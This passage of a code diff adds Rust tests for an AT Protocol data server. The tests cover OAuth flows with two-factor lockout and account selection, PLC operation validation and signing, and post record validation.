"authorization_code"), 1791 + ("code", auth_code), 1792 + ("redirect_uri", redirect_uri), 1793 + ("code_verifier", &code_verifier), 1794 + ("client_id", &client_id), 1795 + ]) 1796 + .send() 1797 + .await 1798 + .unwrap(); 1799 + 1800 + assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed"); 1801 + let token_body: Value = token_res.json().await.unwrap(); 1802 + assert!(token_body["access_token"].is_string()); 1803 + assert_eq!(token_body["sub"], user_did); 1804 + } 1805 + 1806 + #[tokio::test] 1807 + async fn test_2fa_lockout_after_max_attempts() { 1808 + let url = base_url().await; 1809 + let http_client = client(); 1810 + 1811 + let ts = Utc::now().timestamp_millis(); 1812 + let handle = format!("2fa-lockout-{}", ts); 1813 + let email = format!("2fa-lockout-{}@example.com", ts); 1814 + let password = "2fa-test-password"; 1815 + 1816 + let create_res = http_client 1817 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1818 + .json(&json!({ 1819 + "handle": handle, 1820 + "email": email, 1821 + "password": password 1822 + })) 1823 + .send() 1824 + .await 1825 + .unwrap(); 1826 + assert_eq!(create_res.status(), StatusCode::OK); 1827 + let account: Value = create_res.json().await.unwrap(); 1828 + let user_did = account["did"].as_str().unwrap(); 1829 + 1830 + let db_url = common::get_db_connection_string().await; 1831 + let pool = sqlx::postgres::PgPoolOptions::new() 1832 + .max_connections(1) 1833 + .connect(&db_url) 1834 + .await 1835 + .expect("Failed to connect to database"); 1836 + 1837 + sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 1838 + .bind(user_did) 1839 + .execute(&pool) 1840 + .await 1841 + .expect("Failed to enable 2FA"); 1842 + 1843 + let redirect_uri = "https://example.com/2fa-lockout-callback"; 1844 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 1845 + let client_id = mock_client.uri(); 1846 + 1847 + let (_, code_challenge) = generate_pkce(); 1848 + 1849 + let par_body: Value = http_client 1850 + .post(format!("{}/oauth/par", url)) 1851 + .form(&[ 1852 + ("response_type", "code"), 1853 + ("client_id", &client_id), 1854 + ("redirect_uri", redirect_uri), 1855 + ("code_challenge", &code_challenge), 1856 + ("code_challenge_method", "S256"), 1857 + ]) 1858 + .send() 1859 + .await 1860 + .unwrap() 1861 + .json() 1862 + .await 1863 + .unwrap(); 1864 + 1865 + let request_uri = par_body["request_uri"].as_str().unwrap(); 1866 + 1867 + let auth_client = no_redirect_client(); 1868 + let auth_res = auth_client 1869 + .post(format!("{}/oauth/authorize", url)) 1870 + .form(&[ 1871 + ("request_uri", request_uri), 1872 + ("username", &handle), 1873 + ("password", password), 1874 + ("remember_device", "false"), 1875 + ]) 1876 + .send() 1877 + .await 1878 + .unwrap(); 1879 + 1880 + assert!(auth_res.status().is_redirection()); 1881 + 1882 + for i in 0..5 { 1883 + let res = http_client 1884 + .post(format!("{}/oauth/authorize/2fa", url)) 1885 + .form(&[ 1886 + ("request_uri", request_uri), 1887 + ("code", "999999"), 1888 + ]) 1889 + .send() 1890 + .await 1891 + .unwrap(); 1892 + 1893 + if i < 4 { 1894 + assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1); 1895 + let body = res.text().await.unwrap(); 1896 + assert!( 1897 + body.contains("Invalid verification code"), 1898 + "Should show invalid code error on attempt {}", i + 1 1899 + ); 1900 + } 1901 + } 1902 + 1903 + let lockout_res = http_client 1904 + .post(format!("{}/oauth/authorize/2fa", url)) 1905 + .form(&[ 1906 + ("request_uri", request_uri), 1907 + ("code", "999999"), 1908 + ]) 1909 + .send() 1910 + .await 1911 + .unwrap(); 1912 + 1913 + assert_eq!(lockout_res.status(), StatusCode::OK); 1914 + let body = lockout_res.text().await.unwrap(); 1915 + assert!( 1916 + body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"), 1917 + "Should be locked out after max attempts. Body: {}", 1918 + &body[..body.len().min(500)] 1919 + ); 1920 + } 1921 + 1922 + #[tokio::test] 1923 + async fn test_account_selector_with_2fa_requires_verification() { 1924 + let url = base_url().await; 1925 + let http_client = client(); 1926 + 1927 + let ts = Utc::now().timestamp_millis(); 1928 + let handle = format!("selector-2fa-{}", ts); 1929 + let email = format!("selector-2fa-{}@example.com", ts); 1930 + let password = "selector-2fa-password"; 1931 + 1932 + let create_res = http_client 1933 + .post(format!("{}/xrpc/com.atproto.server.createAccount", url)) 1934 + .json(&json!({ 1935 + "handle": handle, 1936 + "email": email, 1937 + "password": password 1938 + })) 1939 + .send() 1940 + .await 1941 + .unwrap(); 1942 + assert_eq!(create_res.status(), StatusCode::OK); 1943 + let account: Value = create_res.json().await.unwrap(); 1944 + let user_did = account["did"].as_str().unwrap().to_string(); 1945 + 1946 + let redirect_uri = "https://example.com/selector-2fa-callback"; 1947 + let mock_client = setup_mock_client_metadata(redirect_uri).await; 1948 + let client_id = mock_client.uri(); 1949 + 1950 + let (code_verifier, code_challenge) = generate_pkce(); 1951 + 1952 + let par_body: Value = http_client 1953 + .post(format!("{}/oauth/par", url)) 1954 + .form(&[ 1955 + ("response_type", "code"), 1956 + ("client_id", &client_id), 1957 + ("redirect_uri", redirect_uri), 1958 + ("code_challenge", &code_challenge), 1959 + ("code_challenge_method", "S256"), 1960 + ]) 1961 + .send() 1962 + .await 1963 + .unwrap() 1964 + .json() 1965 + .await 1966 + .unwrap(); 1967 + 1968 + let request_uri = par_body["request_uri"].as_str().unwrap(); 1969 + 1970 + let auth_client = no_redirect_client(); 1971 + let auth_res = auth_client 1972 + .post(format!("{}/oauth/authorize", url)) 1973 + .form(&[ 1974 + ("request_uri", request_uri), 1975 + ("username", &handle), 1976 + ("password", password), 1977 + ("remember_device", "true"), 1978 + ]) 1979 + .send() 1980 + .await 1981 + .unwrap(); 1982 + 1983 + assert!(auth_res.status().is_redirection()); 1984 + 1985 + let device_cookie = auth_res.headers() 1986 + .get("set-cookie") 1987 + .and_then(|v| v.to_str().ok()) 1988 + .map(|s| s.split(';').next().unwrap_or("").to_string()) 1989 + .expect("Should have received device cookie"); 1990 + 1991 + let location = auth_res.headers().get("location").unwrap().to_str().unwrap(); 1992 + assert!(location.contains("code="), "First auth should succeed"); 1993 + 1994 + let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 1995 + let _token_body: Value = http_client 1996 + .post(format!("{}/oauth/token", url)) 1997 + .form(&[ 1998 + ("grant_type", "authorization_code"), 1999 + ("code", code), 2000 + ("redirect_uri", redirect_uri), 2001 + ("code_verifier", &code_verifier), 2002 + ("client_id", &client_id), 2003 + ]) 2004 + .send() 2005 + .await 2006 + .unwrap() 2007 + .json() 2008 + .await 2009 + .unwrap(); 2010 + 2011 + let db_url = common::get_db_connection_string().await; 2012 + let pool = sqlx::postgres::PgPoolOptions::new() 2013 + .max_connections(1) 2014 + .connect(&db_url) 2015 + .await 2016 + .expect("Failed to connect to database"); 2017 + 2018 + sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1") 2019 + .bind(&user_did) 2020 + .execute(&pool) 2021 + .await 2022 + .expect("Failed to enable 2FA"); 2023 + 2024 + let (code_verifier2, code_challenge2) = generate_pkce(); 2025 + 2026 + let par_body2: Value = http_client 2027 + .post(format!("{}/oauth/par", url)) 2028 + .form(&[ 2029 + ("response_type", "code"), 2030 + ("client_id", &client_id), 2031 + ("redirect_uri", redirect_uri), 2032 + ("code_challenge", &code_challenge2), 2033 + ("code_challenge_method", "S256"), 2034 + ]) 2035 + .send() 2036 + .await 2037 + .unwrap() 2038 + .json() 2039 + .await 2040 + .unwrap(); 2041 + 2042 + let request_uri2 = par_body2["request_uri"].as_str().unwrap(); 2043 + 2044 + let select_res = auth_client 2045 + .post(format!("{}/oauth/authorize/select", url)) 2046 + .header("cookie", &device_cookie) 2047 + .form(&[ 2048 + ("request_uri", request_uri2), 2049 + ("did", &user_did), 2050 + ]) 2051 + .send() 2052 + .await 2053 + .unwrap(); 2054 + 2055 + assert!( 2056 + select_res.status().is_redirection(), 2057 + "Account selector should redirect, got status: {}", 2058 + select_res.status() 2059 + ); 2060 + 2061 + let select_location = select_res.headers().get("location").unwrap().to_str().unwrap(); 2062 + assert!( 2063 + select_location.contains("/oauth/authorize/2fa"), 2064 + "Account selector with 2FA enabled should redirect to 2FA page, got: {}", 2065 + select_location 2066 + ); 2067 + 2068 + let twofa_code: String = sqlx::query_scalar( 2069 + "SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1" 2070 + ) 2071 + .bind(request_uri2) 2072 + .fetch_one(&pool) 2073 + .await 2074 + .expect("Failed to get 2FA code"); 2075 + 2076 + let twofa_res = auth_client 2077 + .post(format!("{}/oauth/authorize/2fa", url)) 2078 + .header("cookie", &device_cookie) 2079 + .form(&[ 2080 + ("request_uri", request_uri2), 2081 + ("code", &twofa_code), 2082 + ]) 2083 + .send() 2084 + .await 2085 + .unwrap(); 2086 + 2087 + assert!(twofa_res.status().is_redirection()); 2088 + let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap(); 2089 + assert!( 2090 + final_location.starts_with(redirect_uri) && final_location.contains("code="), 2091 + "After 2FA, should redirect to client with code, got: {}", 2092 + final_location 2093 + ); 2094 + 2095 + let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap(); 2096 + let token_res = http_client 2097 + .post(format!("{}/oauth/token", url)) 2098 + .form(&[ 2099 + ("grant_type", "authorization_code"), 2100 + ("code", final_code), 2101 + ("redirect_uri", redirect_uri), 2102 + ("code_verifier", &code_verifier2), 2103 + ("client_id", &client_id), 2104 + ]) 2105 + .send() 2106 + .await 2107 + .unwrap(); 2108 + 2109 + assert_eq!(token_res.status(), StatusCode::OK); 2110 + let final_token: Value = token_res.json().await.unwrap(); 2111 + assert_eq!(final_token["sub"], user_did, "Token should be for the correct user"); 2112 + }
+1
tests/oauth_security.rs
··· 735 736 let auth_res = http_client 737 .post(format!("{}/oauth/authorize", url)) 738 .form(&[ 739 ("request_uri", request_uri), 740 ("username", &handle),
··· 735 736 let auth_res = http_client 737 .post(format!("{}/oauth/authorize", url)) 738 + .header("Accept", "application/json") 739 .form(&[ 740 ("request_uri", request_uri), 741 ("username", &handle),
+2
tests/plc_migration.rs
··· 255 } 256 257 #[tokio::test] 258 async fn test_sign_plc_operation_consumes_token() { 259 let client = client(); 260 let (token, did) = create_account_and_login(&client).await; ··· 902 } 903 904 #[tokio::test] 905 async fn test_full_migration_flow_end_to_end() { 906 let client = client(); 907 let (token, did) = create_account_and_login(&client).await;
··· 255 } 256 257 #[tokio::test] 258 + #[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"] 259 async fn test_sign_plc_operation_consumes_token() { 260 let client = client(); 261 let (token, did) = create_account_and_login(&client).await; ··· 903 } 904 905 #[tokio::test] 906 + #[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"] 907 async fn test_full_migration_flow_end_to_end() { 908 let client = client(); 909 let (token, did) = create_account_and_login(&client).await;
+513
tests/plc_validation.rs
···
··· 1 + use bspds::plc::{ 2 + PlcError, PlcOperation, PlcService, PlcValidationContext, 3 + cid_for_cbor, sign_operation, signing_key_to_did_key, 4 + validate_plc_operation, validate_plc_operation_for_submission, 5 + verify_operation_signature, 6 + }; 7 + use k256::ecdsa::SigningKey; 8 + use serde_json::json; 9 + use std::collections::HashMap; 10 + 11 + fn create_valid_operation() -> serde_json::Value { 12 + let key = SigningKey::random(&mut rand::thread_rng()); 13 + let did_key = signing_key_to_did_key(&key); 14 + 15 + let op = json!({ 16 + "type": "plc_operation", 17 + "rotationKeys": [did_key.clone()], 18 + "verificationMethods": { 19 + "atproto": did_key.clone() 20 + }, 21 + "alsoKnownAs": ["at://test.handle"], 22 + "services": { 23 + "atproto_pds": { 24 + "type": "AtprotoPersonalDataServer", 25 + "endpoint": "https://pds.example.com" 26 + } 27 + }, 28 + "prev": null 29 + }); 30 + 31 + sign_operation(&op, &key).unwrap() 32 + } 33 + 34 + #[test] 35 + fn test_validate_plc_operation_valid() { 36 + let op = create_valid_operation(); 37 + let result = validate_plc_operation(&op); 38 + assert!(result.is_ok()); 39 + } 40 + 41 + #[test] 42 + fn test_validate_plc_operation_missing_type() { 43 + let op = json!({ 44 + "rotationKeys": [], 45 + "verificationMethods": {}, 46 + "alsoKnownAs": [], 47 + "services": {}, 48 + "sig": "test" 49 + }); 50 + let result = validate_plc_operation(&op); 51 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type"))); 52 + } 53 + 54 + #[test] 55 + fn test_validate_plc_operation_invalid_type() { 56 + let op = json!({ 57 + "type": "invalid_type", 58 + "sig": "test" 59 + }); 60 + let result = validate_plc_operation(&op); 61 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type"))); 62 + } 63 + 64 + #[test] 65 + fn test_validate_plc_operation_missing_sig() { 66 + let op = json!({ 67 + "type": "plc_operation", 68 + "rotationKeys": [], 69 + "verificationMethods": {}, 70 + "alsoKnownAs": [], 71 + "services": {} 72 + }); 73 + let result = validate_plc_operation(&op); 74 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig"))); 75 + } 76 + 77 + #[test] 78 + fn test_validate_plc_operation_missing_rotation_keys() { 79 + let op = json!({ 80 + "type": "plc_operation", 81 + "verificationMethods": {}, 82 + "alsoKnownAs": [], 83 + "services": {}, 84 + "sig": "test" 85 + }); 86 + let result = validate_plc_operation(&op); 87 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys"))); 88 + } 89 + 90 + #[test] 91 + fn test_validate_plc_operation_missing_verification_methods() { 92 + let op = json!({ 93 + "type": "plc_operation", 94 + "rotationKeys": [], 95 + "alsoKnownAs": [], 96 + "services": {}, 97 + "sig": "test" 98 + }); 99 + let result = validate_plc_operation(&op); 100 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods"))); 101 + } 102 + 103 + #[test] 104 + fn test_validate_plc_operation_missing_also_known_as() { 105 + let op = json!({ 106 + "type": "plc_operation", 107 + "rotationKeys": [], 108 + "verificationMethods": {}, 109 + "services": {}, 110 + "sig": "test" 111 + }); 112 + let result = validate_plc_operation(&op); 113 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs"))); 114 + } 115 + 116 + #[test] 117 + fn test_validate_plc_operation_missing_services() { 118 + let op = json!({ 119 + "type": "plc_operation", 120 + "rotationKeys": [], 121 + "verificationMethods": {}, 122 + "alsoKnownAs": [], 123 + "sig": "test" 124 + }); 125 + let result = validate_plc_operation(&op); 126 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services"))); 127 + } 128 + 129 + #[test] 130 + fn test_validate_rotation_key_required() { 131 + let key = SigningKey::random(&mut rand::thread_rng()); 132 + let did_key = signing_key_to_did_key(&key); 133 + let server_key = "did:key:zServer123"; 134 + 135 + let op = json!({ 136 + "type": "plc_operation", 137 + "rotationKeys": [did_key.clone()], 138 + "verificationMethods": {"atproto": did_key.clone()}, 139 + "alsoKnownAs": ["at://test.handle"], 140 + "services": { 141 + "atproto_pds": { 142 + "type": "AtprotoPersonalDataServer", 143 + "endpoint": "https://pds.example.com" 144 + } 145 + }, 146 + "sig": "test" 147 + }); 148 + 149 + let ctx = PlcValidationContext { 150 + server_rotation_key: server_key.to_string(), 151 + expected_signing_key: did_key.clone(), 152 + expected_handle: "test.handle".to_string(), 153 + expected_pds_endpoint: "https://pds.example.com".to_string(), 154 + }; 155 + 156 + let result = validate_plc_operation_for_submission(&op, &ctx); 157 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key"))); 158 + } 159 + 160 + #[test] 161 + fn test_validate_signing_key_match() { 162 + let key = SigningKey::random(&mut rand::thread_rng()); 163 + let did_key = signing_key_to_did_key(&key); 164 + let wrong_key = "did:key:zWrongKey456"; 165 + 166 + let op = json!({ 167 + "type": "plc_operation", 168 + "rotationKeys": [did_key.clone()], 169 + "verificationMethods": {"atproto": wrong_key}, 170 + "alsoKnownAs": ["at://test.handle"], 171 + "services": { 172 + "atproto_pds": { 173 + "type": "AtprotoPersonalDataServer", 174 + "endpoint": "https://pds.example.com" 175 + } 176 + }, 177 + "sig": "test" 178 + }); 179 + 180 + let ctx = PlcValidationContext { 181 + server_rotation_key: did_key.clone(), 182 + expected_signing_key: did_key.clone(), 183 + expected_handle: "test.handle".to_string(), 184 + expected_pds_endpoint: "https://pds.example.com".to_string(), 185 + }; 186 + 187 + let result = validate_plc_operation_for_submission(&op, &ctx); 188 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key"))); 189 + } 190 + 191 + #[test] 192 + fn test_validate_handle_match() { 193 + let key = SigningKey::random(&mut rand::thread_rng()); 194 + let did_key = signing_key_to_did_key(&key); 195 + 196 + let op = json!({ 197 + "type": "plc_operation", 198 + "rotationKeys": [did_key.clone()], 199 + "verificationMethods": {"atproto": did_key.clone()}, 200 + "alsoKnownAs": ["at://wrong.handle"], 201 + "services": { 202 + "atproto_pds": { 203 + "type": "AtprotoPersonalDataServer", 204 + "endpoint": "https://pds.example.com" 205 + } 206 + }, 207 + "sig": "test" 208 + }); 209 + 210 + let ctx = PlcValidationContext { 211 + server_rotation_key: did_key.clone(), 212 + expected_signing_key: did_key.clone(), 213 + expected_handle: "test.handle".to_string(), 214 + expected_pds_endpoint: "https://pds.example.com".to_string(), 215 + }; 216 + 217 + let result = validate_plc_operation_for_submission(&op, &ctx); 218 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle"))); 219 + } 220 + 221 + #[test] 222 + fn test_validate_pds_service_type() { 223 + let key = SigningKey::random(&mut rand::thread_rng()); 224 + let did_key = signing_key_to_did_key(&key); 225 + 226 + let op = json!({ 227 + "type": "plc_operation", 228 + "rotationKeys": [did_key.clone()], 229 + "verificationMethods": {"atproto": did_key.clone()}, 230 + "alsoKnownAs": ["at://test.handle"], 231 + "services": { 232 + "atproto_pds": { 233 + "type": "WrongServiceType", 234 + "endpoint": "https://pds.example.com" 235 + } 236 + }, 237 + "sig": "test" 238 + }); 239 + 240 + let ctx = PlcValidationContext { 241 + server_rotation_key: did_key.clone(), 242 + expected_signing_key: did_key.clone(), 243 + expected_handle: "test.handle".to_string(), 244 + expected_pds_endpoint: "https://pds.example.com".to_string(), 245 + }; 246 + 247 + let result = validate_plc_operation_for_submission(&op, &ctx); 248 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type"))); 249 + } 250 + 251 + #[test] 252 + fn test_validate_pds_endpoint_match() { 253 + let key = SigningKey::random(&mut rand::thread_rng()); 254 + let did_key = signing_key_to_did_key(&key); 255 + 256 + let op = json!({ 257 + "type": "plc_operation", 258 + "rotationKeys": [did_key.clone()], 259 + "verificationMethods": {"atproto": did_key.clone()}, 260 + "alsoKnownAs": ["at://test.handle"], 261 + "services": { 262 + "atproto_pds": { 263 + "type": "AtprotoPersonalDataServer", 264 + "endpoint": "https://wrong.endpoint.com" 265 + } 266 + }, 267 + "sig": "test" 268 + }); 269 + 270 + let ctx = PlcValidationContext { 271 + server_rotation_key: did_key.clone(), 272 + expected_signing_key: did_key.clone(), 273 + expected_handle: "test.handle".to_string(), 274 + expected_pds_endpoint: "https://pds.example.com".to_string(), 275 + }; 276 + 277 + let result = validate_plc_operation_for_submission(&op, &ctx); 278 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint"))); 279 + } 280 + 281 + #[test] 282 + fn test_verify_signature_secp256k1() { 283 + let key = SigningKey::random(&mut rand::thread_rng()); 284 + let did_key = signing_key_to_did_key(&key); 285 + 286 + let op = json!({ 287 + "type": "plc_operation", 288 + "rotationKeys": [did_key.clone()], 289 + "verificationMethods": {}, 290 + "alsoKnownAs": [], 291 + "services": {}, 292 + "prev": null 293 + }); 294 + 295 + let signed = sign_operation(&op, &key).unwrap(); 296 + let rotation_keys = vec![did_key]; 297 + 298 + let result = verify_operation_signature(&signed, &rotation_keys); 299 + assert!(result.is_ok()); 300 + assert!(result.unwrap()); 301 + } 302 + 303 + #[test] 304 + fn test_verify_signature_wrong_key() { 305 + let key = SigningKey::random(&mut rand::thread_rng()); 306 + let other_key = SigningKey::random(&mut rand::thread_rng()); 307 + let other_did_key = signing_key_to_did_key(&other_key); 308 + 309 + let op = json!({ 310 + "type": "plc_operation", 311 + "rotationKeys": [], 312 + "verificationMethods": {}, 313 + "alsoKnownAs": [], 314 + "services": {}, 315 + "prev": null 316 + }); 317 + 318 + let signed = sign_operation(&op, &key).unwrap(); 319 + let wrong_rotation_keys = vec![other_did_key]; 320 + 321 + let result = verify_operation_signature(&signed, &wrong_rotation_keys); 322 + assert!(result.is_ok()); 323 + assert!(!result.unwrap()); 324 + } 325 + 326 + #[test] 327 + fn test_verify_signature_invalid_did_key_format() { 328 + let key = SigningKey::random(&mut rand::thread_rng()); 329 + 330 + let op = json!({ 331 + "type": "plc_operation", 332 + "rotationKeys": [], 333 + "verificationMethods": {}, 334 + "alsoKnownAs": [], 335 + "services": {}, 336 + "prev": null 337 + }); 338 + 339 + let signed = sign_operation(&op, &key).unwrap(); 340 + let invalid_keys = vec!["not-a-did-key".to_string()]; 341 + 342 + let result = verify_operation_signature(&signed, &invalid_keys); 343 + assert!(result.is_ok()); 344 + assert!(!result.unwrap()); 345 + } 346 + 347 + #[test] 348 + fn test_tombstone_validation() { 349 + let op = json!({ 350 + "type": "plc_tombstone", 351 + "prev": "bafyreig6xxxxxyyyyyzzzzzz", 352 + "sig": "test" 353 + }); 354 + let result = validate_plc_operation(&op); 355 + assert!(result.is_ok()); 356 + } 357 + 358 + #[test] 359 + fn test_cid_for_cbor_deterministic() { 360 + let value = json!({ 361 + "alpha": 1, 362 + "beta": 2 363 + }); 364 + 365 + let cid1 = cid_for_cbor(&value).unwrap(); 366 + let cid2 = cid_for_cbor(&value).unwrap(); 367 + 368 + assert_eq!(cid1, cid2, "CID generation should be deterministic"); 369 + assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)"); 370 + } 371 + 372 + #[test] 373 + fn test_cid_different_for_different_data() { 374 + let value1 = json!({"data": 1}); 375 + let value2 = json!({"data": 2}); 376 + 377 + let cid1 = cid_for_cbor(&value1).unwrap(); 378 + let cid2 = cid_for_cbor(&value2).unwrap(); 379 + 380 + assert_ne!(cid1, cid2, "Different data should produce different CIDs"); 381 + } 382 + 383 + #[test] 384 + fn test_signing_key_to_did_key_format() { 385 + let key = SigningKey::random(&mut rand::thread_rng()); 386 + let did_key = signing_key_to_did_key(&key); 387 + 388 + assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z"); 389 + assert!(did_key.len() > 50, "Did key should be reasonably long"); 390 + } 391 + 392 + #[test] 393 + fn test_signing_key_to_did_key_unique() { 394 + let key1 = SigningKey::random(&mut rand::thread_rng()); 395 + let key2 = SigningKey::random(&mut rand::thread_rng()); 396 + 397 + let did1 = signing_key_to_did_key(&key1); 398 + let did2 = signing_key_to_did_key(&key2); 399 + 400 + assert_ne!(did1, did2, "Different keys should produce different did:keys"); 401 + } 402 + 403 + #[test] 404 + fn test_signing_key_to_did_key_consistent() { 405 + let key = SigningKey::random(&mut rand::thread_rng()); 406 + 407 + let did1 = signing_key_to_did_key(&key); 408 + let did2 = signing_key_to_did_key(&key); 409 + 410 + assert_eq!(did1, did2, "Same key should produce same did:key"); 411 + } 412 + 413 + #[test] 414 + fn test_sign_operation_removes_existing_sig() { 415 + let key = SigningKey::random(&mut rand::thread_rng()); 416 + let op = json!({ 417 + "type": "plc_operation", 418 + "rotationKeys": [], 419 + "verificationMethods": {}, 420 + "alsoKnownAs": [], 421 + "services": {}, 422 + "prev": null, 423 + "sig": "old_signature" 424 + }); 425 + 426 + let signed = sign_operation(&op, &key).unwrap(); 427 + let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap(); 428 + 429 + assert_ne!(new_sig, "old_signature", "Should replace old signature"); 430 + } 431 + 432 + #[test] 433 + fn test_validate_plc_operation_not_object() { 434 + let result = validate_plc_operation(&json!("not an object")); 435 + assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 436 + } 437 + 438 + #[test] 439 + fn test_validate_for_submission_tombstone_passes() { 440 + let key = SigningKey::random(&mut rand::thread_rng()); 441 + let did_key = signing_key_to_did_key(&key); 442 + 443 + let op = json!({ 444 + "type": "plc_tombstone", 445 + "prev": "bafyreig6xxxxxyyyyyzzzzzz", 446 + "sig": "test" 447 + }); 448 + 449 + let ctx = PlcValidationContext { 450 + server_rotation_key: did_key.clone(), 451 + expected_signing_key: did_key, 452 + expected_handle: "test.handle".to_string(), 453 + expected_pds_endpoint: "https://pds.example.com".to_string(), 454 + }; 455 + 456 + let result = validate_plc_operation_for_submission(&op, &ctx); 457 + assert!(result.is_ok(), "Tombstone should pass submission validation"); 458 + } 459 + 460 + #[test] 461 + fn test_verify_signature_missing_sig() { 462 + let op = json!({ 463 + "type": "plc_operation", 464 + "rotationKeys": [], 465 + "verificationMethods": {}, 466 + "alsoKnownAs": [], 467 + "services": {} 468 + }); 469 + 470 + let result = verify_operation_signature(&op, &[]); 471 + assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig"))); 472 + } 473 + 474 + #[test] 475 + fn test_verify_signature_invalid_base64() { 476 + let op = json!({ 477 + "type": "plc_operation", 478 + "rotationKeys": [], 479 + "verificationMethods": {}, 480 + "alsoKnownAs": [], 481 + "services": {}, 482 + "sig": "not-valid-base64!!!" 483 + }); 484 + 485 + let result = verify_operation_signature(&op, &[]); 486 + assert!(matches!(result, Err(PlcError::InvalidResponse(_)))); 487 + } 488 + 489 + #[test] 490 + fn test_plc_operation_struct() { 491 + let mut services = HashMap::new(); 492 + services.insert("atproto_pds".to_string(), PlcService { 493 + service_type: "AtprotoPersonalDataServer".to_string(), 494 + endpoint: "https://pds.example.com".to_string(), 495 + }); 496 + 497 + let mut verification_methods = HashMap::new(); 498 + verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string()); 499 + 500 + let op = PlcOperation { 501 + op_type: "plc_operation".to_string(), 502 + rotation_keys: vec!["did:key:zTest123".to_string()], 503 + verification_methods, 504 + also_known_as: vec!["at://test.handle".to_string()], 505 + services, 506 + prev: None, 507 + sig: Some("test".to_string()), 508 + }; 509 + 510 + let json_value = serde_json::to_value(&op).unwrap(); 511 + assert_eq!(json_value["type"], "plc_operation"); 512 + assert!(json_value["rotationKeys"].is_array()); 513 + }
+590
tests/record_validation.rs
···
··· 1 + use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid}; 2 + use serde_json::json; 3 + 4 + fn now() -> String { 5 + chrono::Utc::now().to_rfc3339() 6 + } 7 + 8 + #[test] 9 + fn test_validate_post_valid() { 10 + let validator = RecordValidator::new(); 11 + let post = json!({ 12 + "$type": "app.bsky.feed.post", 13 + "text": "Hello world!", 14 + "createdAt": now() 15 + }); 16 + let result = validator.validate(&post, "app.bsky.feed.post"); 17 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 18 + } 19 + 20 + #[test] 21 + fn test_validate_post_missing_text() { 22 + let validator = RecordValidator::new(); 23 + let post = json!({ 24 + "$type": "app.bsky.feed.post", 25 + "createdAt": now() 26 + }); 27 + let result = validator.validate(&post, "app.bsky.feed.post"); 28 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text")); 29 + } 30 + 31 + #[test] 32 + fn test_validate_post_missing_created_at() { 33 + let validator = RecordValidator::new(); 34 + let post = json!({ 35 + "$type": "app.bsky.feed.post", 36 + "text": "Hello" 37 + }); 38 + let result = validator.validate(&post, "app.bsky.feed.post"); 39 + assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt")); 40 + } 41 + 42 + #[test] 43 + fn test_validate_post_text_too_long() { 44 + let validator = RecordValidator::new(); 45 + let long_text = "a".repeat(3001); 46 + let post = json!({ 47 + "$type": "app.bsky.feed.post", 48 + "text": long_text, 49 + "createdAt": now() 50 + }); 51 + let result = validator.validate(&post, "app.bsky.feed.post"); 52 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text")); 53 + } 54 + 55 + #[test] 56 + fn test_validate_post_text_at_limit() { 57 + let validator = RecordValidator::new(); 58 + let limit_text = "a".repeat(3000); 59 + let post = json!({ 60 + "$type": "app.bsky.feed.post", 61 + "text": limit_text, 62 + "createdAt": now() 63 + }); 64 + let result = validator.validate(&post, "app.bsky.feed.post"); 65 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 66 + } 67 + 68 + #[test] 69 + fn test_validate_post_too_many_langs() { 70 + let validator = RecordValidator::new(); 71 + let post = json!({ 72 + "$type": "app.bsky.feed.post", 73 + "text": "Hello", 74 + "createdAt": now(), 75 + "langs": ["en", "fr", "de", "es"] 76 + }); 77 + let result = validator.validate(&post, "app.bsky.feed.post"); 78 + assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs")); 79 + } 80 + 81 + #[test] 82 + fn test_validate_post_three_langs_ok() { 83 + let validator = RecordValidator::new(); 84 + let post = json!({ 85 + "$type": "app.bsky.feed.post", 86 + "text": "Hello", 87 + "createdAt": now(), 88 + "langs": ["en", "fr", "de"] 89 + }); 90 + let result = validator.validate(&post, "app.bsky.feed.post"); 91 + assert_eq!(result.unwrap(), ValidationStatus::Valid); 92 + } 93 + 94 + #[test] 95 + fn test_validate_post_too_many_tags() { 96 + let validator = RecordValidator::new(); 97 + let post = json!({ 98 + "$type": "app.bsky.feed.post", 99 + "text": "Hello", 100 + "createdAt": now(), 101 + "tags": ["tag1", "tag2", 